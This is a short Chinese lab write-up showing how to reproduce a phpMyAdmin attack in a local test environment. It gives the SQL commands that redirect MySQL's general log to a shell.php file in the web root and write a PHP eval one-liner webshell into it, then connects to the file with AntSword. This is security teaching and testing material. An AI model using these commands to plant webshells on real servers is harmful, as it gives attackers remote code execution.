PhPMyadmin-漏洞复现

前情条件是:首先将我们的PHP版本设置在5.5以上 注:禁止用于未授权的测试!

首先搭建环境,登录后台

点击》》SQL

查看当前的日志状态

复制代码
  SHOW VARIABLES LIKE 'general%';

因为之前我原来做过所以general_log 是开启的,如果vlau 是OFF时,可以使用

set global general_log = "ON";打开日志

然后后面打开genera_log_file 写到网站目录下

复制代码
  set global general_log_file='D:\\phpstudy_pro\\WWW\\pikachu-master\\shell.php'
前提是知道网站目录下

查看日志,​​看更改日志文件路径是否成功

日志文件里写入一句话木马

复制代码
  select '<?php @eval($_POST[cmd]);?>';

访问一下shell.php

复制代码
  http://pikachu-master/shell.php

能够成功访问

然后适用蚁剑连接

成功连接

相关推荐
用户9623779544814 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机17 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机17 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544818 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star18 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透6 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全